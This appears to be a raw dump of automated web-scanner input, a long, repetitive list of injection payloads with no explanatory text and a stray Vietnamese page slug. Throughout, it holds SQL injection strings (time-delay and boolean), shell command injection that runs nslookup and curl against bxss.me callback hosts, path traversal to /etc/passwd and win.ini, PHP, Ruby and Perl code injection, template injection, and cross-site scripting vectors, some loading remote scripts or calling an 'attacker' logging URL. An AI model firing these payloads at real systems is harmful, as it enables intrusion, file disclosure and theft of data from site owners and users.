555
-1 OR 5*5=25 --
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
1EYX8HEOPQ20
)
-1' OR 5*5=25 or 's5jKksbP'='
!(()&&!|*|*|
-1" OR 5*5=25 or "ot7qN5NE"="
^(#$!@#$)(()))******
redirtest.acx
555*if(now()=sysdate(),sleep(15),0)
'"()
555'&&sleep(27*1000)*sdqshe&&'
echo giscjg$()\ udfgqu\nz^xyu||a #' &echo giscjg$()\ udfgqu\nz^xyu||a #|" &echo giscjg$()\ udfgqu\nz^xyu||a #
555"&&sleep(27*1000)*djosyt&&"
&echo scacms$()\ mbhwgf\nz^xyu||a #' &echo scacms$()\ mbhwgf\nz^xyu||a #|" &echo scacms$()\ mbhwgf\nz^xyu||a #
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555'||sleep(27*1000)*siupkt||'
555&echo vgunex$()\ fzwiuw\nz^xyu||a #' &echo vgunex$()\ fzwiuw\nz^xyu||a #|" &echo vgunex$()\ fzwiuw\nz^xyu||a #
555"||sleep(27*1000)*jhcpke||"
|echo qanblq$()\ dhxxat\nz^xyu||a #' |echo qanblq$()\ dhxxat\nz^xyu||a #|" |echo qanblq$()\ dhxxat\nz^xyu||a #
555|echo tphijd$()\ eyjhkx\nz^xyu||a #' |echo tphijd$()\ eyjhkx\nz^xyu||a #|" |echo tphijd$()\ eyjhkx\nz^xyu||a #
expr 9000261116 - 946644
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(nslookup -q=cname hitrrjkjwsoep065f5.bxss.me||curl hitrrjkjwsoep065f5.bxss.me))
$(nslookup -q=cname hitbmprcyjnnj094dc.bxss.me||curl hitbmprcyjnnj094dc.bxss.me)
&nslookup -q=cname hitgurtehckul1eeb0.bxss.me&'\"`0&nslookup -q=cname hitgurtehckul1eeb0.bxss.me&`'
../../../../../../../../../../../../../../etc/passwd
&(nslookup -q=cname hitzurrnuekij72a82.bxss.me||curl hitzurrnuekij72a82.bxss.me)&'\"`0&(nslookup -q=cname hitzurrnuekij72a82.bxss.me||curl hitzurrnuekij72a82.bxss.me)&`'
../../../../../../../../../../../../../../windows/win.ini
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
|(nslookup -q=cname hitgtcaiprvma54ec2.bxss.me||curl hitgtcaiprvma54ec2.bxss.me)
file:///etc/passwd
`(nslookup -q=cname hittqolokhqdi63798.bxss.me||curl hittqolokhqdi63798.bxss.me)`
../555
;(nslookup -q=cname hitvbhdeaekvt3837f.bxss.me||curl hitvbhdeaekvt3837f.bxss.me)|(nslookup -q=cname hitvbhdeaekvt3837f.bxss.me||curl hitvbhdeaekvt3837f.bxss.me)&(nslookup -q=cname hitvbhdeaekvt3837f.bxss.me||curl hitvbhdeaekvt3837f.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitrzywthnvnt44bb2.bxss.me||curl${IFS}hitrzywthnvnt44bb2.bxss.me)
555-1; waitfor delay '0:0:15' --
&(nslookup${IFS}-q${IFS}cname${IFS}hitwkzgfitdoyee8c9.bxss.me||curl${IFS}hitwkzgfitdoyee8c9.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitwkzgfitdoyee8c9.bxss.me||curl${IFS}hitwkzgfitdoyee8c9.bxss.me)&`'
555-1); waitfor delay '0:0:15' --
555-1)); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555<esi:include src="http://bxss.me/rpb.png"/>
${9999426+9999839}
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
/etc/shells
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555CrTzz6IT'; waitfor delay '0:0:15' --
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
bxss.me
Http://bxss.me/t/fit.txt
"+"A".concat(70-3).concat(22*4).concat(103).concat(65).concat(104).concat(79)+(require"socket"Socket.gethostbyname("hitjd"+"csrftksic28ad.bxss.me.")[3].to_s)+"
http://bxss.me/t/fit.txt?.jpg
'+'A'.concat(70-3).concat(22*4).concat(115).concat(80).concat(105).concat(68)+(require'socket'Socket.gethostbyname('hitam'+'tdakrekzd7539.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(122).concat(86).concat(110).concat(71)+(require'socket'Socket.gethostbyname('hitlz'+'zpyzeirab44c9.bxss.me.')[3].to_s)
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555Ic6Fpkaa'); waitfor delay '0:0:15' --
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
555nlbOHN8d')); waitfor delay '0:0:15' --
555-1 OR 70=(SELECT 70 FROM PG_SLEEP(15))--
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555-1) OR 21=(SELECT 21 FROM PG_SLEEP(15))--
555-1)) OR 814=(SELECT 814 FROM PG_SLEEP(15))--
555HvdTeuGg' OR 673=(SELECT 673 FROM PG_SLEEP(15))--
huong-dan-u-rac-thai-huu-co-tai-nha
huong-dan-u-rac-thai-huu-co-tai-nha/.
555U0uHxlaN') OR 463=(SELECT 463 FROM PG_SLEEP(15))--
555'"()&%<zzz><ScRiPt >w1jd(9515)</ScRiPt>
'.gethostbyname(lc('hitns'.'crhvicng31007.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(74).chr(112).chr(80).'
".gethostbyname(lc("hityl"."zwwnmcnjd6853.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(78).chr(116).chr(68)."
555gOx9sx06')) OR 29=(SELECT 29 FROM PG_SLEEP(15))--
gethostbyname(lc('hitdx'.'ogccitpu0ee0d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(65).chr(113).chr(79)
'"
'"()&%<zzz><ScRiPt >w1jd(9444)</ScRiPt>
response.write(9362918*9950783)
<!--
'+response.write(9362918*9950783)+'
"+response.write(9362918*9950783)+"
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
<% response.write(9362918*9950783) %>
+response.write(9362918*9950783)'
5559194674
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
bfg7672<s1﹥s2ʺs3ʹhjl7672
555'"
555%C0%A7%C0%A2%2527%2522\'\"
bfgx7704%C0%BEz1%C0%BCz2a%90bcxhjl7704
@@rJTFS
(select 198766*667891)
(select 198766*667891 from DUAL)
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >w1jd(9533)</ScRiPt>
555<WN7WLO>DOJPL[!+!]</WN7WLO>
555<script>w1jd(9569)</script>
555<script>w1jd(9730)</script>9730
555<ScR<ScRiPt>IpT>w1jd(9141)</sCr<ScRiPt>IpT>
555<ScRiPt >w1jd(9258)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9316></ScRiPt>
555<isindex type=image src=1 onerror=w1jd(9637)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9447'>
555<body onload=w1jd(9490)>
555<img src=//xss.bxss.me/t/dot.gif onload=w1jd(9012)>
555<img src=xyz OnErRor=w1jd(9798)>
555<img/src=">" onerror=alert(9302)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%77%31%6A%64%289782%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\w1jd(9052)\u003C/sCripT\u003E
555<ScRiPt>w1jd(9539)</sCripT>
%F6<img zzz onmouseover=w1jd(99231) //%F6>
555<input autofocus onfocus=w1jd(9694)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(w1jd(9884))}
555XOAnJ<ScRiPt >w1jd(9938)</ScRiPt>
555<WCGKLA>2SKUK[!+!]</WCGKLA>
555<ifRAme sRc=9161.com></IfRamE>
555<aNBy9CN x=9811>
555<img sRc='http://attacker-9770/log.php?
555<a0wVmxc<
-1' OR 5*5=25 or 'YTE0CNbC'='
-1" OR 5*5=25 or "3UMy4JIB"="
555'&&sleep(27*1000)*cgvrmd&&'
555"&&sleep(27*1000)*ujctxy&&"
echo ccizon$()\ edcrui\nz^xyu||a #' &echo ccizon$()\ edcrui\nz^xyu||a #|" &echo ccizon$()\ edcrui\nz^xyu||a #
555'||sleep(27*1000)*pxkvcb||'
&echo wpopft$()\ yglawu\nz^xyu||a #' &echo wpopft$()\ yglawu\nz^xyu||a #|" &echo wpopft$()\ yglawu\nz^xyu||a #
555"||sleep(27*1000)*depqvp||"
555&echo dkrcqb$()\ tepida\nz^xyu||a #' &echo dkrcqb$()\ tepida\nz^xyu||a #|" &echo dkrcqb$()\ tepida\nz^xyu||a #
|echo pgmtxr$()\ uxkfff\nz^xyu||a #' |echo pgmtxr$()\ uxkfff\nz^xyu||a #|" |echo pgmtxr$()\ uxkfff\nz^xyu||a #
555|echo bvvagf$()\ bqkdgm\nz^xyu||a #' |echo bvvagf$()\ bqkdgm\nz^xyu||a #|" |echo bvvagf$()\ bqkdgm\nz^xyu||a #
expr 9000602410 - 919945
(nslookup -q=cname hitrsbelojxyy9e561.bxss.me||curl hitrsbelojxyy9e561.bxss.me))
$(nslookup -q=cname hitibgtlinaztaffc3.bxss.me||curl hitibgtlinaztaffc3.bxss.me)
${9999360+10000360}
&nslookup -q=cname hitbiatixnmty9fa3d.bxss.me&'\"`0&nslookup -q=cname hitbiatixnmty9fa3d.bxss.me&`'
&(nslookup -q=cname hitualqeimvty8d3ee.bxss.me||curl hitualqeimvty8d3ee.bxss.me)&'\"`0&(nslookup -q=cname hitualqeimvty8d3ee.bxss.me||curl hitualqeimvty8d3ee.bxss.me)&`'
|(nslookup -q=cname hitlcqdtgbpfs72fb1.bxss.me||curl hitlcqdtgbpfs72fb1.bxss.me)
`(nslookup -q=cname hitkqljimlbase6b62.bxss.me||curl hitkqljimlbase6b62.bxss.me)`
;(nslookup -q=cname hitrgpnfweqeb64bcd.bxss.me||curl hitrgpnfweqeb64bcd.bxss.me)|(nslookup -q=cname hitrgpnfweqeb64bcd.bxss.me||curl hitrgpnfweqeb64bcd.bxss.me)&(nslookup -q=cname hitrgpnfweqeb64bcd.bxss.me||curl hitrgpnfweqeb64bcd.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitaxhvaooprkf7248.bxss.me||curl${IFS}hitaxhvaooprkf7248.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitkfpravmnxp6cc71.bxss.me||curl${IFS}hitkfpravmnxp6cc71.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitkfpravmnxp6cc71.bxss.me||curl${IFS}hitkfpravmnxp6cc71.bxss.me)&`'
555Twqwcta9'; waitfor delay '0:0:15' --
555StLwNEjx'); waitfor delay '0:0:15' --
"+"A".concat(70-3).concat(22*4).concat(111).concat(83).concat(111).concat(67)+(require"socket"Socket.gethostbyname("hitem"+"pknlrjib755ea.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(110).concat(86).concat(100).concat(66)+(require'socket'Socket.gethostbyname('hitma'+'cqglczyy07c5a.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(98).concat(84).concat(113).concat(73)+(require'socket'Socket.gethostbyname('hitnl'+'dsqgccta1fa35.bxss.me.')[3].to_s)
555Auh7KntJ')); waitfor delay '0:0:15' --
555-1 OR 529=(SELECT 529 FROM PG_SLEEP(15))--
555-1) OR 706=(SELECT 706 FROM PG_SLEEP(15))--
555-1)) OR 757=(SELECT 757 FROM PG_SLEEP(15))--
555HtHXQd6R' OR 178=(SELECT 178 FROM PG_SLEEP(15))--
555obx26n9s') OR 608=(SELECT 608 FROM PG_SLEEP(15))--
555TVpa94Od')) OR 125=(SELECT 125 FROM PG_SLEEP(15))--
'.gethostbyname(lc('hitrx'.'dhoourjo4c425.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(73).chr(119).chr(71).'
555'"()&%<zzz><ScRiPt >viV5(9723)</ScRiPt>
".gethostbyname(lc("hitqj"."xiwxzise2597c.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(79).chr(103).chr(66)."
gethostbyname(lc('hitsd'.'askcqxvx863e7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(72).chr(104).chr(68)
'"()&%<zzz><ScRiPt >viV5(9696)</ScRiPt>
@@fiUjj
5559296266
bfg8180<s1﹥s2ʺs3ʹhjl8180
response.write(9860443*9935153)
'+response.write(9860443*9935153)+'
555'"()&%<zzz><ScRiPt >BF3G(9642)</ScRiPt>
"+response.write(9860443*9935153)+"
<% response.write(9860443*9935153) %>
bfgx8946%C0%BEz1%C0%BCz2a%90bcxhjl8946
+response.write(9860443*9935153)'
'"()&%<zzz><ScRiPt >BF3G(9110)</ScRiPt>
5559330446
555<ScRiPt >viV5(9746)</ScRiPt>
555<WANRPB>GGO5N[!+!]</WANRPB>
555<script>viV5(9925)</script>
555<script>viV5(9076)</script>9076
555<ScR<ScRiPt>IpT>viV5(9338)</sCr<ScRiPt>IpT>
555<ScRiPt >viV5(9742)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9133></ScRiPt>
555<isindex type=image src=1 onerror=viV5(9287)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9735'>
555<body onload=viV5(9930)>
555<img src=//xss.bxss.me/t/dot.gif onload=viV5(9548)>
555<img src=xyz OnErRor=viV5(9946)>
555<img/src=">" onerror=alert(9424)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%76%69%56%35%289145%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\viV5(9922)\u003C/sCripT\u003E
555<ScRiPt>viV5(9938)</sCripT>
%F6<img zzz onmouseover=viV5(98841) //%F6>
555<input autofocus onfocus=viV5(9772)>
555}body{zzz:Expre/**/SSion(viV5(9424))}
555Tazpb<ScRiPt >viV5(9927)</ScRiPt>
555<WONU2G>2JEXP[!+!]</WONU2G>
555<ifRAme sRc=9949.com></IfRamE>
555<aRNNvLm x=9666>
555<img sRc='http://attacker-9151/log.php?
555<a2gi76i<
-1' OR 5*5=25 or '7TeVfTtz'='
-1" OR 5*5=25 or "aVtJyrQ9"="
echo eknrsq$()\ nmudhn\nz^xyu||a #' &echo eknrsq$()\ nmudhn\nz^xyu||a #|" &echo eknrsq$()\ nmudhn\nz^xyu||a #
555'&&sleep(27*1000)*yxjpso&&'
&echo oorqmc$()\ xejcoj\nz^xyu||a #' &echo oorqmc$()\ xejcoj\nz^xyu||a #|" &echo oorqmc$()\ xejcoj\nz^xyu||a #
555"&&sleep(27*1000)*vklbuw&&"
555&echo pctojb$()\ abhcde\nz^xyu||a #' &echo pctojb$()\ abhcde\nz^xyu||a #|" &echo pctojb$()\ abhcde\nz^xyu||a #
555'||sleep(27*1000)*qfyvjw||'
|echo ryfufi$()\ spamml\nz^xyu||a #' |echo ryfufi$()\ spamml\nz^xyu||a #|" |echo ryfufi$()\ spamml\nz^xyu||a #
${9999518+10000447}
555|echo gthskp$()\ xlbldn\nz^xyu||a #' |echo gthskp$()\ xlbldn\nz^xyu||a #|" |echo gthskp$()\ xlbldn\nz^xyu||a #
555"||sleep(27*1000)*avxqbw||"
expr 9000550302 - 921342
555FT1JUC9I'; waitfor delay '0:0:15' --
(nslookup -q=cname hitrcsshnzahobf030.bxss.me||curl hitrcsshnzahobf030.bxss.me))
$(nslookup -q=cname hitotrygvphyted075.bxss.me||curl hitotrygvphyted075.bxss.me)
555v64zHvaY'); waitfor delay '0:0:15' --
555wiXmqpKQ')); waitfor delay '0:0:15' --
&nslookup -q=cname hitzulmqaotfjc937a.bxss.me&'\"`0&nslookup -q=cname hitzulmqaotfjc937a.bxss.me&`'
555-1 OR 663=(SELECT 663 FROM PG_SLEEP(15))--
&(nslookup -q=cname hitnyxfabypgl9bae0.bxss.me||curl hitnyxfabypgl9bae0.bxss.me)&'\"`0&(nslookup -q=cname hitnyxfabypgl9bae0.bxss.me||curl hitnyxfabypgl9bae0.bxss.me)&`'
555-1) OR 739=(SELECT 739 FROM PG_SLEEP(15))--
555-1)) OR 184=(SELECT 184 FROM PG_SLEEP(15))--
|(nslookup -q=cname hitygocrrfvqp6d225.bxss.me||curl hitygocrrfvqp6d225.bxss.me)
`(nslookup -q=cname hitirxlswqvtt3a419.bxss.me||curl hitirxlswqvtt3a419.bxss.me)`
555UGYCQmYG' OR 479=(SELECT 479 FROM PG_SLEEP(15))--
555hgNo1HGZ') OR 809=(SELECT 809 FROM PG_SLEEP(15))--
;(nslookup -q=cname hitxedeowjwblaf956.bxss.me||curl hitxedeowjwblaf956.bxss.me)|(nslookup -q=cname hitxedeowjwblaf956.bxss.me||curl hitxedeowjwblaf956.bxss.me)&(nslookup -q=cname hitxedeowjwblaf956.bxss.me||curl hitxedeowjwblaf956.bxss.me)
555uTS7I4Hk')) OR 58=(SELECT 58 FROM PG_SLEEP(15))--
|(nslookup${IFS}-q${IFS}cname${IFS}hitytbrycpwqn4f1ac.bxss.me||curl${IFS}hitytbrycpwqn4f1ac.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hituchngiknzr31a8a.bxss.me||curl${IFS}hituchngiknzr31a8a.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hituchngiknzr31a8a.bxss.me||curl${IFS}hituchngiknzr31a8a.bxss.me)&`'
"+"A".concat(70-3).concat(22*4).concat(107).concat(70).concat(109).concat(78)+(require"socket"Socket.gethostbyname("hitdj"+"wvjuqnwz8241b.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(108).concat(65).concat(106).concat(83)+(require'socket'Socket.gethostbyname('hitsd'+'vnzidgvs0cc2a.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(111).concat(73).concat(108).concat(84)+(require'socket'Socket.gethostbyname('hitvp'+'wbltarlgfcbb3.bxss.me.')[3].to_s)
@@mzxtO
555'"()&%<zzz><ScRiPt >z7kD(9010)</ScRiPt>
'.gethostbyname(lc('hitiz'.'evsonfno1aa66.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(66).chr(120).chr(67).'
'"()&%<zzz><ScRiPt >z7kD(9475)</ScRiPt>
".gethostbyname(lc("hitzr"."ssowatqv422d8.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(72).chr(98).chr(73)."
gethostbyname(lc('hitij'.'ujhmarjib78d4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(87).chr(113).chr(85)
5559975830
bfg7721<s1﹥s2ʺs3ʹhjl7721
bfgx2186%C0%BEz1%C0%BCz2a%90bcxhjl2186
response.write(9347947*9846425)
'+response.write(9347947*9846425)+'
"+response.write(9347947*9846425)+"
<% response.write(9347947*9846425) %>
+response.write(9347947*9846425)'
555<ScRiPt >z7kD(9828)</ScRiPt>
555'"()&%<zzz><ScRiPt >ddBq(9128)</ScRiPt>
555<WIZJZP>DXCGJ[!+!]</WIZJZP>
'"()&%<zzz><ScRiPt >ddBq(9454)</ScRiPt>
555<script>z7kD(9198)</script>
555<script>z7kD(9035)</script>9035
5559267055
555<ScR<ScRiPt>IpT>z7kD(9188)</sCr<ScRiPt>IpT>
555<ScRiPt >z7kD(9901)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9394></ScRiPt>
555<isindex type=image src=1 onerror=z7kD(9918)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9659'>
555<body onload=z7kD(9659)>
555<img src=//xss.bxss.me/t/dot.gif onload=z7kD(9683)>
555<img src=xyz OnErRor=z7kD(9191)>
555<img/src=">" onerror=alert(9029)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%7A%37%6B%44%289112%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\z7kD(9051)\u003C/sCripT\u003E
555<ScRiPt>z7kD(9202)</sCripT>
%F6<img zzz onmouseover=z7kD(96271) //%F6>
555<input autofocus onfocus=z7kD(9399)>
555}body{zzz:Expre/**/SSion(z7kD(9725))}
5555z2RC<ScRiPt >z7kD(9549)</ScRiPt>
555<WJJIRA>WVICK[!+!]</WJJIRA>
555<ifRAme sRc=9072.com></IfRamE>
555<azWofS6 x=9377>
555<img sRc='http://attacker-9075/log.php?
555<avtB4Ok<
555'"()&%<zzz><ScRiPt >o75o(9587)</ScRiPt>
'"()&%<zzz><ScRiPt >o75o(9587)</ScRiPt>
5559725174
bfg1524<s1﹥s2ʺs3ʹhjl1524
bfgx6716%C0%BEz1%C0%BCz2a%90bcxhjl6716
555<ScRiPt >o75o(9840)</ScRiPt>
555<W4SZUZ>6AXFW[!+!]</W4SZUZ>
555<script>o75o(9776)</script>
555<script>o75o(9594)</script>9594
555<ScR<ScRiPt>IpT>o75o(9390)</sCr<ScRiPt>IpT>
555<ScRiPt >o75o(9647)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9670></ScRiPt>
555<isindex type=image src=1 onerror=o75o(9189)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9968'>
555<body onload=o75o(9839)>
555<img src=//xss.bxss.me/t/dot.gif onload=o75o(9066)>
555<img src=xyz OnErRor=o75o(9217)>
555<img/src=">" onerror=alert(9857)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%37%35%6F%289508%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\o75o(9095)\u003C/sCripT\u003E
555<ScRiPt>o75o(9248)</sCripT>
%F6<img zzz onmouseover=o75o(92331) //%F6>
555<input autofocus onfocus=o75o(9261)>
555}body{zzz:Expre/**/SSion(o75o(9946))}
555IH5Ht<ScRiPt >o75o(9368)</ScRiPt>
555<WY3VL8>XCTCD[!+!]</WY3VL8>
555<ifRAme sRc=9563.com></IfRamE>
555<aRtZGD1 x=9115>
555<img sRc='http://attacker-9098/log.php?
555<aK3X9Zc<
555
555
555
-1 OR 5*5=25 --
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
1EYX8HEOPQ20
)
-1' OR 5*5=25 or 's5jKksbP'='
!(()&&!|*|*|
555
-1" OR 5*5=25 or "ot7qN5NE"="
^(#$!@#$)(()))******
redirtest.acx
555
555
555
555
555*if(now()=sysdate(),sleep(15),0)
555
'"()
555'&&sleep(27*1000)*sdqshe&&'
echo giscjg$()\ udfgqu\nz^xyu||a #' &echo giscjg$()\ udfgqu\nz^xyu||a #|" &echo giscjg$()\ udfgqu\nz^xyu||a #
555"&&sleep(27*1000)*djosyt&&"
&echo scacms$()\ mbhwgf\nz^xyu||a #' &echo scacms$()\ mbhwgf\nz^xyu||a #|" &echo scacms$()\ mbhwgf\nz^xyu||a #
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555'||sleep(27*1000)*siupkt||'
555&echo vgunex$()\ fzwiuw\nz^xyu||a #' &echo vgunex$()\ fzwiuw\nz^xyu||a #|" &echo vgunex$()\ fzwiuw\nz^xyu||a #
555"||sleep(27*1000)*jhcpke||"
|echo qanblq$()\ dhxxat\nz^xyu||a #' |echo qanblq$()\ dhxxat\nz^xyu||a #|" |echo qanblq$()\ dhxxat\nz^xyu||a #
555|echo tphijd$()\ eyjhkx\nz^xyu||a #' |echo tphijd$()\ eyjhkx\nz^xyu||a #|" |echo tphijd$()\ eyjhkx\nz^xyu||a #
expr 9000261116 - 946644
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(nslookup -q=cname hitrrjkjwsoep065f5.bxss.me||curl hitrrjkjwsoep065f5.bxss.me))
$(nslookup -q=cname hitbmprcyjnnj094dc.bxss.me||curl hitbmprcyjnnj094dc.bxss.me)
&nslookup -q=cname hitgurtehckul1eeb0.bxss.me&'\"`0&nslookup -q=cname hitgurtehckul1eeb0.bxss.me&`'
../../../../../../../../../../../../../../etc/passwd
555
&(nslookup -q=cname hitzurrnuekij72a82.bxss.me||curl hitzurrnuekij72a82.bxss.me)&'\"`0&(nslookup -q=cname hitzurrnuekij72a82.bxss.me||curl hitzurrnuekij72a82.bxss.me)&`'
../../../../../../../../../../../../../../windows/win.ini
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
|(nslookup -q=cname hitgtcaiprvma54ec2.bxss.me||curl hitgtcaiprvma54ec2.bxss.me)
file:///etc/passwd
555
`(nslookup -q=cname hittqolokhqdi63798.bxss.me||curl hittqolokhqdi63798.bxss.me)`
555
555
../555
;(nslookup -q=cname hitvbhdeaekvt3837f.bxss.me||curl hitvbhdeaekvt3837f.bxss.me)|(nslookup -q=cname hitvbhdeaekvt3837f.bxss.me||curl hitvbhdeaekvt3837f.bxss.me)&(nslookup -q=cname hitvbhdeaekvt3837f.bxss.me||curl hitvbhdeaekvt3837f.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitrzywthnvnt44bb2.bxss.me||curl${IFS}hitrzywthnvnt44bb2.bxss.me)
555
555
555
555-1; waitfor delay '0:0:15' --
&(nslookup${IFS}-q${IFS}cname${IFS}hitwkzgfitdoyee8c9.bxss.me||curl${IFS}hitwkzgfitdoyee8c9.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitwkzgfitdoyee8c9.bxss.me||curl${IFS}hitwkzgfitdoyee8c9.bxss.me)&`'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555-1); waitfor delay '0:0:15' --
555
555
555
555
555-1)); waitfor delay '0:0:15' --
555
555
555
555
555-1 waitfor delay '0:0:15' --
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
${9999426+9999839}
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
/etc/shells
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555CrTzz6IT'; waitfor delay '0:0:15' --
../../../../../../../../../../../../../../etc/shells
555
c:/windows/win.ini
bxss.me
Http://bxss.me/t/fit.txt
"+"A".concat(70-3).concat(22*4).concat(103).concat(65).concat(104).concat(79)+(require"socket"
Socket.gethostbyname("hitjd"+"csrftksic28ad.bxss.me.")[3].to_s)+"
http://bxss.me/t/fit.txt?.jpg
'+'A'.concat(70-3).concat(22*4).concat(115).concat(80).concat(105).concat(68)+(require'socket'
Socket.gethostbyname('hitam'+'tdakrekzd7539.bxss.me.')[3].to_s)+'
555
'A'.concat(70-3).concat(22*4).concat(122).concat(86).concat(110).concat(71)+(require'socket'
Socket.gethostbyname('hitlz'+'zpyzeirab44c9.bxss.me.')[3].to_s)
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555Ic6Fpkaa'); waitfor delay '0:0:15' --
555
';print(md5(31337));$a='
555
";print(md5(31337));$a="
555
555
${@print(md5(31337))}
555
${@print(md5(31337))}\
555
555
'.print(md5(31337)).'
555
555nlbOHN8d')); waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555-1 OR 70=(SELECT 70 FROM PG_SLEEP(15))--
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555
555-1) OR 21=(SELECT 21 FROM PG_SLEEP(15))--
555
555-1)) OR 814=(SELECT 814 FROM PG_SLEEP(15))--
555HvdTeuGg' OR 673=(SELECT 673 FROM PG_SLEEP(15))--
huong-dan-u-rac-thai-huu-co-tai-nha
huong-dan-u-rac-thai-huu-co-tai-nha/.
555
555
555U0uHxlaN') OR 463=(SELECT 463 FROM PG_SLEEP(15))--
555'"()&%<zzz><ScRiPt >w1jd(9515)</ScRiPt>
'.gethostbyname(lc('hitns'.'crhvicng31007.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(74).chr(112).chr(80).'
".gethostbyname(lc("hityl"."zwwnmcnjd6853.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(78).chr(116).chr(68)."
555gOx9sx06')) OR 29=(SELECT 29 FROM PG_SLEEP(15))--
gethostbyname(lc('hitdx'.'ogccitpu0ee0d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(65).chr(113).chr(79)
555
555
'"
'"()&%<zzz><ScRiPt >w1jd(9444)</ScRiPt>
response.write(9362918*9950783)
555
<!--
'+response.write(9362918*9950783)+'
555
"+response.write(9362918*9950783)+"
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
<% response.write(9362918*9950783) %>
+response.write(9362918*9950783)'
555
5559194674
555
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555
bfg7672<s1﹥s2ʺs3ʹhjl7672
555
555'"
555%C0%A7%C0%A2%2527%2522\'\"
bfgx7704%C0%BEz1%C0%BCz2a%90bcxhjl7704
@@rJTFS
(select 198766*667891)
(select 198766*667891 from DUAL)
<%={{={@{#{${dfb}}%>
555
<th:t="${dfb}#foreach
555
